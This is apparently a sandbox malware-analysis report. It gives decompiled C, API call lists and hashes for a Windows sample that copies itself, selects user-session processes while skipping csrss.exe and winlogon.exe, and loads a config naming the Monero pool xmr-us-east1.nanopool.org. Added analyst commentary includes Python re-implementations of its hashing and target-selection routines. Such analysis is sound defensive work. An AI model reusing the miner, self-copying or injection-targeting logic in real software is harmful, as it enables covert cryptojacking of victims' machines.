								_t83 = NtCreateFile( &_v12, 0x120116,  &_v60,  &_v36,  &_v68, 0x80, 0, 0, 0x60, 0, 0); // executed
								if(_t83 != 0) {
									L16:
									VirtualFree(_t109, 0, 0x8000); // MEM_RELEASE
									_t85 = E00407ED0(_t104);
									asm("sbb eax, eax");
									return  ~( ~_t85);
								} else {
									_v20 = _t83;
									_v16 = _t83;
									// Unresolved import pointer; the argument layout matches NtWriteFile, copying the buffered image to the new file.
									_t90 =  *0x5d10c0(_v12, 0, 0, 0,  &_v36, _t109, _v28,  &_v20, _t83); // executed
									_push(_v12);
									if(_t90 == 0) {
										NtClose();
										VirtualFree(_t109, 0, 0x8000); // executed
										return 1;
									} else {
										NtClose();
										goto L16;
									}
								}
							} else {
								VirtualFree(_t109, 0, 0x8000);
								return 0;
							}
						} else {
							NtClose(_v8);
							VirtualFree(_t109, 0, 0x8000);
							return 0;
						}
					} else {
						NtClose(_v8);
						return 0;
					}
				} else {
					NtClose(_v8);
					goto L6;
				}
			}
		}
	}
}

                                                                                                        (Instruction address column for the listing above, 0x00406354 to 0x004065ca, spilled out of the decompiler layout by extraction; the call sites it belonged to are listed under APIs below.)

                                                                                                        APIs
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 004063BC
                                                                                                        • RtlDosPathNameToNtPathName_U.NTDLL(?,?,00000000,00000000), ref: 004063E4
                                                                                                        • NtCreateFile.NTDLL(00000000,00120089,00000018,00000000,00000000,00000080,00000003,00000001,00000060,00000000,00000000), ref: 0040643B
                                                                                                        • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 0040644C
                                                                                                        • NtClose.NTDLL(00000000), ref: 00406459
                                                                                                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?), ref: 00406472
                                                                                                        • NtClose.NTDLL(00000000), ref: 00406481
                                                                                                        • NtReadFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004064A5
                                                                                                        • NtClose.NTDLL(00000000), ref: 004064B2
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004064C0
                                                                                                        • NtClose.NTDLL(00000000), ref: 004064D1
                                                                                                        • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 004064E3
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004064F5
                                                                                                        • NtCreateFile.NTDLL(00000000,00120116,00000018,00000000,00000000,00000080,00000000,00000000,00000060,00000000,00000000), ref: 00406550
                                                                                                        • NtWriteFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00406576
                                                                                                        • NtClose.NTDLL(00000000), ref: 00406583
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00406591
                                                                                                        • NtClose.NTDLL(00000000), ref: 004065AC
                                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004065BA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseFile$Virtual$FreePath$Name$CreateName_$AllocModuleReadSizeWrite
                                                                                                        • String ID: @
                                                                                                        • API String ID: 1655568127-2766056989
                                                                                                        • Opcode ID: e18825e1e8f1edecaee0ecfc773bdb3614a0eca66b86556126c1a6f2c5aeab46
                                                                                                        • Instruction ID: 2fd8ed99f3ae58de8391e8baf5aa5f6abea6aa1d3bd579213be14ba4813b3cc0
                                                                                                        • Opcode Fuzzy Hash: e18825e1e8f1edecaee0ecfc773bdb3614a0eca66b86556126c1a6f2c5aeab46
                                                                                                        • Instruction Fuzzy Hash: B4715A71A4121CBBEB209F90DC49BEEBBB8FB08704F100126F605F62D0D7B55A588B99
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 35%
                                                                                                        			// File-fingerprint routine: CryptoAPI MD5 over the file named by _a4, written as
                                                                                                        			// 32 table-encoded characters (two per digest byte) to the buffer at _a8.
                                                                                                        			// Returns 1 on success, 0 on any failure.
                                                                                                        			E00408B20(char _a4, intOrPtr _a8) {
                                                                                                        				long* _v8;
                                                                                                        				int _v12;
                                                                                                        				long _v16;
                                                                                                        				int _v20;
                                                                                                        				char _v24;
                                                                                                        				char _v56;
                                                                                                        				void _v1080;
                                                                                                        				char _t39;
                                                                                                        				void* _t40;
                                                                                                        				long** _t42;
                                                                                                        				int* _t43;
                                                                                                        				int _t46;
                                                                                                        				char* _t51;
                                                                                                        				void* _t60;
                                                                                                        				intOrPtr* _t69;
                                                                                                        				int _t70;
                                                                                                        				long _t72;
                                                                                                        				signed int _t73;
                                                                                                        				signed int _t75;
                                                                                                        				intOrPtr _t80;
                                                                                                        				void* _t82;
                                                                                                        				void* _t87;
                                                                                                        
                                                                                                        				asm("movups xmm0, [0x40aa14]"); // 16-byte table in .data, used below as a nibble-to-character lookup
                                                                                                        				_t39 =  *0x40aa24; // 0x0
                                                                                                        				_t1 =  &_a4; // 0x40363e
                                                                                                        				_v8 = 0;  // HCRYPTPROV
                                                                                                        				_v12 = 0; // HCRYPTHASH
                                                                                                        				_v16 = 0; // bytes returned by each ReadFile call
                                                                                                        				_v20 = 0; // digest length, in/out for CryptGetHashParam
                                                                                                        				asm("movups [ebp-0x24], xmm0"); // table copied to the stack at ebp-0x24
                                                                                                        				_v24 = _t39;
                                                                                                        				// CreateFileW(path, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_FLAG_SEQUENTIAL_SCAN, NULL)
                                                                                                        				_t40 = CreateFileW( *_t1, 0x80000000, 1, 0, 3, 0x8000000, 0); // executed
                                                                                                        				_t82 = _t40;
                                                                                                        				if(_t82 == 0xffffffff) {
                                                                                                        					L3:
                                                                                                        					return 0;
                                                                                                        				} else {
                                                                                                        					_t42 =  &_v8;
                                                                                                        					__imp__CryptAcquireContextW(_t42, 0, 0, 1, 0xf0000000); // executed -- PROV_RSA_FULL with CRYPT_VERIFYCONTEXT: no key container, hashing only
                                                                                                        					if(_t42 != 0) {
                                                                                                        						_t43 =  &_v12;
                                                                                                        						__imp__CryptCreateHash(_v8, 0x8003, 0, 0, _t43); // executed -- 0x8003 is CALG_MD5
                                                                                                        						if(_t43 != 0) {
                                                                                                        							_t46 = ReadFile(_t82,  &_v1080, 0x400,  &_v16, 0); // executed -- first 0x400-byte block of the file
                                                                                                        							if(_t46 == 0) {
                                                                                                        								L11:
                                                                                                        								_push(0);
                                                                                                        								goto L12;
                                                                                                        							} else {
                                                                                                        								_t69 = __imp__CryptHashData;
                                                                                                        								while(1) {
                                                                                                        									_t72 = _v16;
                                                                                                        									if(_t72 == 0) {
                                                                                                        										break;
                                                                                                        									}
                                                                                                        									_t60 =  *_t69(_v12,  &_v1080, _t72, 0);
                                                                                                        									_push(0);
                                                                                                        									if(_t60 == 0) {
                                                                                                        										L12:
                                                                                                        										CryptReleaseContext(_v8, 0); // dwFlags is the 0 pushed just above; note the provider is released before the hash is destroyed
                                                                                                        										__imp__CryptDestroyHash(_v12);
                                                                                                        										CloseHandle(_t82);
                                                                                                        										L13:
                                                                                                        										return 0;
                                                                                                        									} else {
                                                                                                        										_t46 = ReadFile(_t82,  &_v1080, 0x400,  &_v16, 0); // executed -- lpOverlapped is the 0 pushed above, which the decompiler rendered as ??
                                                                                                        										if(_t46 != 0) {
                                                                                                        											continue;
                                                                                                        										} else {
                                                                                                        											goto L11;
                                                                                                        										}
                                                                                                        									}
                                                                                                        									goto L20;
                                                                                                        								}
                                                                                                        								if(_t46 == 0) {
                                                                                                        									goto L11;
                                                                                                        								} else {
                                                                                                        									_v20 = 0x10; // MD5 digest is 16 bytes
                                                                                                        									_t51 =  &_v56;
                                                                                                        									__imp__CryptGetHashParam(_v12, 2, _t51,  &_v20, 0); // 2 = HP_HASHVAL: finalize and copy the digest to _v56
                                                                                                        									if(_t51 == 0) {
                                                                                                        										goto L13; // returns 0 without CryptDestroyHash, CryptReleaseContext or CloseHandle: the hash, provider and file handles leak on this path
                                                                                                        									} else {
                                                                                                        										_t70 = _v20;
                                                                                                        										_t75 = 0;
                                                                                                        										if(_t70 != 0) {
                                                                                                        											_t80 = _a8;
                                                                                                        											asm("o16 nop [eax+eax]");
                                                                                                        											do { // encode the 16-byte digest at _v56 into _a8, two characters per byte
                                                                                                        												_t73 =  *(_t87 + _t75 - 0x34) & 0x000000ff; // digest[_t75]
                                                                                                        												 *((char*)(_t80 + _t75 * 2)) =  *(_t87 + (_t73 >> 4) - 0x24) & 0x000000ff; // table[high nibble]
                                                                                                        												 *((char*)(_t80 + 1 + _t75 * 2)) =  *(_t87 + (_t73 & 0x0000000f) - 0x24) & 0x000000ff; // table[low nibble]
                                                                                                        												_t75 = _t75 + 1;
                                                                                                        											} while (_t75 < _t70); // _t70 is 0x10, so 32 characters are written and no terminator is appended
                                                                                                        										}
                                                                                                        										__imp__CryptDestroyHash(_v12);
                                                                                                        										CryptReleaseContext(_v8, 0);
                                                                                                        										FindCloseChangeNotification(_t82); // executed -- kernel32 exports this at the same address as CloseHandle; it closes the file opened by CreateFileW above
                                                                                                        										return 1;
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						} else {
                                                                                                        							CloseHandle(_t82);
                                                                                                        							CryptReleaseContext(_v8, 0);
                                                                                                        							return 0;
                                                                                                        						}
                                                                                                        					} else {
                                                                                                        						CloseHandle(_t82);
                                                                                                        						goto L3;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				L20:
                                                                                                         			}

                                                                                                        APIs
                                                                                                        • CreateFileW.KERNELBASE(>6@,80000000,00000001,00000000,00000003,08000000,00000000), ref: 00408B6E
                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000), ref: 00408B8A
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408B95
                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00408BB2
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408BBD
                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00408BC8
                                                                                                        • ReadFile.KERNELBASE(00000000,?,00000400,00000000,00000000,?,00000000), ref: 00408BF0
                                                                                                        • CryptHashData.ADVAPI32(00000000,?,00000000,00000000,?,00000000), ref: 00408C14
                                                                                                        • ReadFile.KERNELBASE(00000000,?,00000400,00000000,00000000,?,00000000), ref: 00408C2D
                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,00000000), ref: 00408C38
                                                                                                        • CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 00408C41
                                                                                                        • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00408C48
                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,?,00000000,00000000,?,00000000), ref: 00408C71
                                                                                                        • CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 00408CB6
                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,00000000), ref: 00408CC1
                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000), ref: 00408CC8
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$Hash$CloseContext$FileHandleRelease$CreateDestroyRead$AcquireChangeDataFindNotificationParam
                                                                                                        • String ID: >6@
                                                                                                        • API String ID: 2963825918-779403629
                                                                                                        • Opcode ID: 873b0d2445dc433d4259a9d3bd515c7c99b398111595db81251911ace00b2671
                                                                                                        • Instruction ID: c20e288969fc02838bc95c2aa2b6e857bba7efe27eb6bc48cd55eb8ba344291c
                                                                                                        • Opcode Fuzzy Hash: 873b0d2445dc433d4259a9d3bd515c7c99b398111595db81251911ace00b2671
                                                                                                        • Instruction Fuzzy Hash: 2751B271A01219BBEB209FA4DE45FEE7BB8EF48300F104075FA44B51E1DB75AE458B68
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%
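The routine whose tail and API list appear above is a CryptoAPI file hash: CreateFileW opens the file read-only with FILE_FLAG_SEQUENTIAL_SCAN (0x08000000), CryptAcquireContextW(PROV_RSA_FULL, CRYPT_VERIFYCONTEXT = 0xF0000000) obtains a provider, CryptCreateHash is called with ALG_ID 0x8003 (CALG_MD5), ReadFile feeds 0x400-byte chunks to CryptHashData until it returns no data, CryptGetHashParam(HP_HASHVAL = 2) retrieves the digest, and the final loop writes two table lookups per digest byte (high nibble, then low nibble) to produce a hex string. The script below is an added analyst example, not code from the sample or from the report; it reproduces the routine portably so the hex string the sample derives from a file can be recomputed on an analysis host and compared. One assumption is labelled: the 16-byte lookup table at [_t87 - 0x24] is taken to be "0123456789abcdef", which this section does not show. The input data in the script is constructed for the example.

```python
"""Portable re-implementation of the file-hashing routine above.

Added analyst example (not code from the sample or from Joe Sandbox). It mirrors
the CryptoAPI sequence visible in the APIs list:
    CryptAcquireContextW(..., PROV_RSA_FULL=1, CRYPT_VERIFYCONTEXT=0xF0000000)
    CryptCreateHash(hProv, 0x8003 = CALG_MD5, ...)
    ReadFile in 0x400-byte chunks -> CryptHashData until ReadFile returns 0 bytes
    CryptGetHashParam(hHash, HP_HASHVAL=2, ...)
    two table lookups per digest byte (high nibble, then low nibble)
ASSUMPTION: the 16-byte lookup table at [_t87 - 0x24] is "0123456789abcdef";
this section of the report does not show its contents.
"""
import hashlib
import io
import os
import tempfile

CHUNK = 0x400                      # ReadFile buffer size from the APIs list
CALG_MD5 = 0x8003                  # ALG_ID passed to CryptCreateHash
NIBBLES = b"0123456789abcdef"      # ASSUMED contents of the nibble table

ALG_NAMES = {CALG_MD5: "md5", 0x8004: "sha1"}   # 0x8004 = CALG_SHA1, for comparison


def hash_stream(fp, alg_id=CALG_MD5):
    """Feed a binary stream to the hash 0x400 bytes at a time, like CryptHashData."""
    h = hashlib.new(ALG_NAMES[alg_id])
    while True:
        buf = fp.read(CHUNK)
        if not buf:                # ReadFile reported 0 bytes: end of file
            break
        h.update(buf)
    return h.digest()


def hex_encode(digest):
    """Reproduce the nibble-table loop: out[2i] = T[b >> 4], out[2i+1] = T[b & 0xF]."""
    out = bytearray()
    for b in digest:
        out.append(NIBBLES[b >> 4])
        out.append(NIBBLES[b & 0x0F])
    return out.decode("ascii")


def hash_bytes(data, alg_id=CALG_MD5):
    """Hex digest of an in-memory buffer (convenience wrapper over hash_stream)."""
    return hex_encode(hash_stream(io.BytesIO(data), alg_id))


def hash_file(path, alg_id=CALG_MD5):
    """(ok, hexdigest); ok=False stands in for the sample's 'return 0' on open failure."""
    try:
        with open(path, "rb") as fp:
            return True, hex_encode(hash_stream(fp, alg_id))
    except OSError:
        return False, ""


def matches_reference(data):
    """Self-check: the chunked path must equal a one-shot hashlib digest."""
    return hash_bytes(data) == hashlib.md5(data).hexdigest()


if __name__ == "__main__":
    # Constructed input: 5 KiB spanning several 0x400-byte ReadFile calls.
    sample = bytes(range(256)) * 20
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, "wb") as f:
        f.write(sample)
    print(hash_file(path), matches_reference(sample))
    os.remove(path)
```

Run it against the dropped files listed elsewhere in the report to obtain the same lowercase MD5 strings the sample would build; if the sample compares such a string against an embedded value, the embedded value is what to search for in its strings and memory dumps. The chunk size only affects the number of CryptHashData calls, not the digest, so a one-shot MD5 from any other tool is a valid cross-check.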

                                                                                                        C-Code - Quality: 85%
                                                                                                        			E004080E0(void* __ebx, void* __edi, void* __esi, char _a4, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                        				void* _v8;
                                                                                                        				struct HINSTANCE__* _v12;
                                                                                                        				char _v272;
                                                                                                        				intOrPtr _v300;
                                                                                                        				void* _v308;
                                                                                                        				void* _t30;
                                                                                                        				struct HINSTANCE__* _t31;
                                                                                                        				void* _t34;
                                                                                                        				int _t37;
                                                                                                        				struct HINSTANCE__* _t39;
                                                                                                        				int _t45;
                                                                                                        				void* _t49;
                                                                                                        				void* _t51;
                                                                                                        				void* _t55;
                                                                                                        				void* _t57;
                                                                                                        				void* _t61;
                                                                                                        				intOrPtr* _t62;
                                                                                                        				intOrPtr* _t66;
                                                                                                        				signed int _t69;
                                                                                                        				void* _t72;
                                                                                                        
                                                                                                        				if(_a4 == 0) {
                                                                                                        					return E00407EF0("explorer.exe");
                                                                                                        				} else {
                                                                                                        					_t69 = 0;
                                                                                                        					_v308 = 0x128;
                                                                                                        					_a4 = 0;
                                                                                                        					_t30 = CreateToolhelp32Snapshot(2, 0); // executed
                                                                                                        					_t61 = _t30;
                                                                                                        					_v8 = _t61;
                                                                                                        					if(_t61 != 0xffffffff) {
                                                                                                        						_t66 = 0;
                                                                                                        						_t31 = LoadLibraryA("kernel32.dll");
                                                                                                        						_v12 = _t31;
                                                                                                        						if(_t31 != 0) {
                                                                                                        							_t66 = GetProcAddress(_t31, "ProcessIdToSessionId");
                                                                                                        						}
                                                                                                        						Process32First(_t61,  &_v308); // executed
                                                                                                        						_t34 = E00408DD0();
                                                                                                        						_t62 = _a8;
                                                                                                        						if(_t34 == 0 || _t66 == 0) {
                                                                                                        							L10:
                                                                                                        							_t69 = 1;
                                                                                                        							 *_t62 = _v300;
                                                                                                        						} else {
                                                                                                        							 *_t66(_v300,  &_a4);
                                                                                                        							if(_a4 != _t69) {
                                                                                                        								_t55 = E00401740("csrss.exe",  &_v272);
                                                                                                        								_t72 = _t72 + 8;
                                                                                                        								if(_t55 != 0) {
                                                                                                        									_t57 = E00401740("winlogon.exe",  &_v272);
                                                                                                        									_t72 = _t72 + 8;
                                                                                                        									if(_t57 != 0) {
                                                                                                        										goto L10;
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        						_t37 = Process32Next(_v8,  &_v308); // executed
                                                                                                        						if(_t37 != 0) {
                                                                                                        							do {
                                                                                                        								if(E00408DD0() == 0 || _t66 == 0) {
                                                                                                        									L18:
                                                                                                        									 *((intOrPtr*)(_t62 + _t69 * 4)) = _v300;
                                                                                                        									_t69 = _t69 + 1;
                                                                                                        									if(_t69 < _a12) {
                                                                                                        										goto L19;
                                                                                                        									}
                                                                                                        								} else {
                                                                                                        									 *_t66(_v300,  &_a4); // executed
                                                                                                        									if(_a4 == 0) {
                                                                                                        										goto L19;
                                                                                                        									} else {
                                                                                                        										_t49 = E00401740("csrss.exe",  &_v272);
                                                                                                        										_t72 = _t72 + 8;
                                                                                                        										if(_t49 == 0) {
                                                                                                        											goto L19;
                                                                                                        										} else {
                                                                                                        											_t51 = E00401740("winlogon.exe",  &_v272);
                                                                                                        											_t72 = _t72 + 8;
                                                                                                        											if(_t51 == 0) {
                                                                                                        												goto L19;
                                                                                                        											} else {
                                                                                                        												goto L18;
                                                                                                        											}
                                                                                                        										}
                                                                                                        									}
                                                                                                        								}
                                                                                                        								goto L20;
                                                                                                        								L19:
                                                                                                        								_t45 = Process32Next(_v8,  &_v308); // executed
                                                                                                        							} while (_t45 != 0);
                                                                                                        						}
                                                                                                        						L20:
                                                                                                        						FindCloseChangeNotification(_v8); // executed
                                                                                                        						_t39 = _v12;
                                                                                                        						if(_t39 != 0) {
                                                                                                        							FreeLibrary(_t39);
                                                                                                        						}
                                                                                                        						return _t69;
                                                                                                        					} else {
                                                                                                        						return 0;
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}
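E004080E0 above is a target-selection routine: it walks a Toolhelp32 process snapshot (TH32CS_SNAPPROCESS = 2, dwSize 0x128 = sizeof PROCESSENTRY32), resolves ProcessIdToSessionId from kernel32.dll at run time, and stores process IDs into the caller's array (_a8, capacity _a12), skipping session-0 processes and any csrss.exe or winlogon.exe; when _a4 is 0 it instead delegates to E00407EF0("explorer.exe"), which this section does not show. The Python model below is an added analyst example, not the sample's code and not part of the report; it replays the decompiled branch structure over a constructed process list so the selection rule can be checked without running the sample. Two assumptions are labelled in the code: E00408DD0, whose meaning is not recoverable from this section, is modelled as a caller-supplied predicate over the entry, and E00401740 is modelled as a case-insensitive string compare returning 0 on match, which is consistent with the "result == 0, skip" branches but is not confirmed by the report.

```python
"""Readable model of the injection-target selection loop in E004080E0 above.

Added analyst example, not the sample's code and not part of the report. It
replays the decompiled branch structure over a constructed process list:
    CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS=2, 0) with a 0x128-byte
        PROCESSENTRY32, walked by Process32First/Process32Next
    ProcessIdToSessionId, resolved from kernel32.dll at run time
    E00408DD0(): meaning not recoverable from this section, so it is modelled
        as a caller-supplied predicate over the entry (ASSUMPTION)
    E00401740("csrss.exe", name) / E00401740("winlogon.exe", name): modelled as
        a case-insensitive string compare returning 0 on match (ASSUMPTION,
        consistent with the 'result == 0 -> skip' branches, not confirmed here)
The _a4 == 0 path (E00407EF0("explorer.exe")) is outside this section and is not
modelled. The process list below is constructed for the example.
"""
from dataclasses import dataclass
from typing import Callable, List, Optional


@dataclass
class ProcEntry:
    """The PROCESSENTRY32 fields the loop reads, plus the per-PID session."""
    pid: int                 # th32ProcessID  (_v300)
    name: str                # szExeFile      (_v272)
    session: Optional[int]   # ProcessIdToSessionId result; None if the API is absent


def name_compare(a: str, b: str) -> int:
    """Model of E00401740: 0 when equal (case-insensitive), non-zero otherwise."""
    return 0 if a.lower() == b.lower() else 1


def should_record(e: ProcEntry, predicate: Callable[[ProcEntry], bool],
                  have_session_api: bool) -> bool:
    """One entry's path through the decompiled branches."""
    if not predicate(e) or not have_session_api:
        return True                                  # L10 / L18: stored unconditionally
    if e.session == 0:                               # _a4 == 0 after ProcessIdToSessionId
        return False                                 # L19: skip session-0 processes
    if name_compare("csrss.exe", e.name) == 0:
        return False
    if name_compare("winlogon.exe", e.name) == 0:
        return False
    return True


def select_targets(entries: List[ProcEntry], predicate: Callable[[ProcEntry], bool],
                   max_count: int, have_session_api: bool = True) -> List[int]:
    """PIDs the loop would store into _a8 (caller's array of _a12 entries).

    The capacity test is reproduced where the decompile has it: the
    Process32First entry is stored with no test at all, and inside the
    Process32Next loop the PID is stored first and _t69 < _a12 is evaluated
    afterwards.  max_count therefore ends the walk; it does not cap the writes.
    """
    pids: List[int] = []
    for i, e in enumerate(entries):
        if not should_record(e, predicate, have_session_api):
            continue
        pids.append(e.pid)
        if i > 0 and len(pids) >= max_count:
            break
    return pids


# Constructed snapshot (not from the report): session 0 plus one user session.
SAMPLE_SNAPSHOT = [
    ProcEntry(4,    "System",       0),
    ProcEntry(412,  "csrss.exe",    0),
    ProcEntry(520,  "winlogon.exe", 1),
    ProcEntry(560,  "csrss.exe",    1),
    ProcEntry(700,  "svchost.exe",  0),
    ProcEntry(1840, "explorer.exe", 1),
    ProcEntry(2200, "notepad.exe",  1),
    ProcEntry(2480, "svchost.exe",  1),
]


def always(_: ProcEntry) -> bool:
    """Stand-in for E00408DD0 returning non-zero for every entry."""
    return True


def never(_: ProcEntry) -> bool:
    """Stand-in for E00408DD0 returning 0 for every entry."""
    return False


if __name__ == "__main__":
    print("predicate true,  capacity 8:", select_targets(SAMPLE_SNAPSHOT, always, 8))
    print("predicate false, capacity 1:", select_targets(SAMPLE_SNAPSHOT, never, 1))
```

With the predicate true for every entry, the constructed snapshot yields the interactive-session processes explorer.exe, notepad.exe and svchost.exe (PID 2480) and nothing from session 0, which is the population a later injection step would draw from. The never/1 case shows an ordering detail of the decompile worth keeping in mind when reading the caller: because the first entry is stored without a test and later entries are stored before _t69 is compared with _a12, a capacity of 1 yields two stored PIDs; whether the caller sizes its array for that is not visible in this section.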

                                                                                                        APIs
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00408107
                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,004067D1,00000002,00000000,7519F7F0,00000000), ref: 00408126
                                                                                                        • GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 00408139
                                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 00408149
                                                                                                        • Process32Next.KERNEL32 ref: 004081B6
                                                                                                        • ProcessIdToSessionId.KERNELBASE(?,00000000,00001000,00000128,00000000,00000128), ref: 004081D7
                                                                                                        • Process32Next.KERNEL32 ref: 00408228
                                                                                                        • FindCloseChangeNotification.KERNELBASE(00001000,00001000,00000128,00000000,00000128), ref: 00408234
                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00408243
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process32$LibraryNext$AddressChangeCloseCreateFindFirstFreeLoadNotificationProcProcessSessionSnapshotToolhelp32
                                                                                                        • String ID: ProcessIdToSessionId$csrss.exe$csrss.exe$explorer.exe$kernel32.dll$winlogon.exe$winlogon.exe
                                                                                                        • API String ID: 2499658570-4289567422
                                                                                                        • Opcode ID: 98e22b258cce26b2785233436b6d0c16d26097fc0348f6c4cb321f3f24bafe53
                                                                                                        • Instruction ID: e2503db8604718d0b55e8117c492ad94a53ae061e857ffc76dcc057c8b58004a
                                                                                                        • Opcode Fuzzy Hash: 98e22b258cce26b2785233436b6d0c16d26097fc0348f6c4cb321f3f24bafe53
                                                                                                        • Instruction Fuzzy Hash: FC41A8759002186BDF10AF60DE41BEA77A8AF54345F0001BEFD44F62C1EF398E51CA99
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 44%
                                                                                                        			E004037E0(void* __eflags, char _a4) {
                                                                                                        				void* _v8;
                                                                                                        				long _v12;
                                                                                                        				long _v16;
                                                                                                        				long _v20;
                                                                                                        				void* _v24;
                                                                                                        				char _v32;
                                                                                                        				long _v36;
                                                                                                        				void* _v40;
                                                                                                        				long _v44;
                                                                                                        				long _v48;
                                                                                                        				long _v52;
                                                                                                        				long _v56;
                                                                                                        				intOrPtr _v60;
                                                                                                        				char* _v64;
                                                                                                        				long _v68;
                                                                                                        				void* _v72;
                                                                                                        				void* _t35;
                                                                                                        				long* _t45;
                                                                                                        				void* _t50;
                                                                                                        				intOrPtr _t59;
                                                                                                        				void* _t60;
                                                                                                        
                                                                                                        				_t1 =  &_a4; // 0x40476c
                                                                                                        				_t59 =  *_t1;
                                                                                                        				_t35 = E00407ED0(_t59); // executed
                                                                                                        				if(_t35 == 0) {
                                                                                                        					L11:
                                                                                                        					return 0;
                                                                                                        				} else {
                                                                                                        					_push(0);
                                                                                                        					_push(0);
                                                                                                        					_v8 = 0;
                                                                                                        					asm("xorps xmm0, xmm0");
                                                                                                        					_v72 = 0;
                                                                                                        					_push( &_v32);
                                                                                                        					_push(_t59);
                                                                                                        					asm("movups [ebp-0x40], xmm0");
                                                                                                        					_v52 = 0;
                                                                                                        					_v24 = 0;
                                                                                                        					_v20 = 0;
                                                                                                        					_v16 = 0;
                                                                                                        					_v12 = 0;
                                                                                                        					_v40 = 0;
                                                                                                        					_v36 = 0;
                                                                                                        					_v48 = 0;
                                                                                                        					_v44 = 0;
                                                                                                        					asm("movq [ebp-0x1c], xmm0");
                                                                                                        					if( *0x5d10b8() != 1) {
                                                                                                        						goto L11;
                                                                                                        					} else {
                                                                                                        						_v72 = 0x18;
                                                                                                        						_v64 =  &_v32;
                                                                                                        						_v68 = 0;
                                                                                                        						_v60 = 0x40;
                                                                                                        						_v56 = 0;
                                                                                                        						_v52 = 0;
                                                                                                        						if(NtCreateFile( &_v8, 0x120089,  &_v72,  &_v24,  &_v40, 0x80, 3, 1, 0x60, 0, 0) != 0) {
                                                                                                        							goto L11;
                                                                                                        						} else {
                                                                                                        							_t45 =  &_v16;
                                                                                                        							__imp__GetFileSizeEx(_v8, _t45);
                                                                                                        							if(_t45 == 0 || _v16 != 0xcc8 || _v12 != 0) {
                                                                                                        								L10:
                                                                                                        								NtClose(_v8);
                                                                                                        								goto L11;
                                                                                                        							} else {
                                                                                                        								_t60 = VirtualAlloc(0, 0xcc8, 0x3000, 4);
                                                                                                        								if(_t60 == 0) {
                                                                                                        									goto L10;
                                                                                                        								} else {
                                                                                                        									_t50 =  *0x5d10bc(_v8, 0, 0, 0,  &_v24, _t60, _v16,  &_v48, 0);
                                                                                                        									_push(_v8);
                                                                                                        									if(_t50 == 0) {
                                                                                                        										NtClose();
                                                                                                        										E00401640("xmr-us-east1.nanopool.org:14444", _t60, 0xcc8);
                                                                                                        										E00401CE0("0125789244697858", 0x10, "xmr-us-east1.nanopool.org:14444", 0xcc8);
                                                                                                        										VirtualFree(_t60, 0, 0x8000);
                                                                                                        										return 1;
                                                                                                        									} else {
                                                                                                        										NtClose();
                                                                                                        										VirtualFree(_t60, 0, 0x8000);
                                                                                                        										return 0;
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}

                                                                                                        APIs
                                                                                                          • Part of subcall function 00407ED0: GetFileAttributesW.KERNELBASE(?,?,004031D3,004047C4,004047C4,\System32\wuapp.exe,004047C4,?,00000000), ref: 00407ED6
                                                                                                        • RtlDosPathNameToNtPathName_U.NTDLL(lG@,?,00000000,00000000), ref: 0040385D
                                                                                                        • NtCreateFile.NTDLL(00000000,00120089,00000018,00000000,00000000,00000080,00000003,00000001,00000060,00000000,00000000), ref: 004038B8
                                                                                                        • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 004038CD
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000CC8,00003000,00000004), ref: 00403900
